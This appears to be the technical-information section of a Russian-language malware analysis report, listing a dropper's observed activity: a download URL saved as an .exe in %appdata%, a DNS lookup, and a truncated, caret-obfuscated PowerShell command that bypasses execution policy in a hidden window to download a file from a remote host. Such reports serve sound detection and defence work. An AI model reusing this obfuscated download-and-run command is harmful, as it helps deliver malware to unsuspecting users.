Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^WE^rsHE^ll^.eX^e^ -ExeCU^t^i^ON^p^O^licy^ b^YPa^S^s ^-nopRo^F^ile -wInDOwST^Yle HI^dDE^N^ (nEw^-o^B^jec^t ^SysTe^M.nEt.WE^bC^Li^e^nt)^.D^oWn^l^oa^D^Fi^LE('http://www.doora...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PO^WE^rsHE^ll^.eX^e^ -ExeCU^t^i^ON^p^O^licy^ b^YPa^S^s ^-nopRo^F^ile -wInDOwST^Yle HI^dDE^N^ (nEw^-o^B^jec^t ^SysTe^M.nEt.WE^bC^Li^e^nt)^.D^oWn^l^oa^D^Fi^LE('http://www.doora...' (со скрытым окном)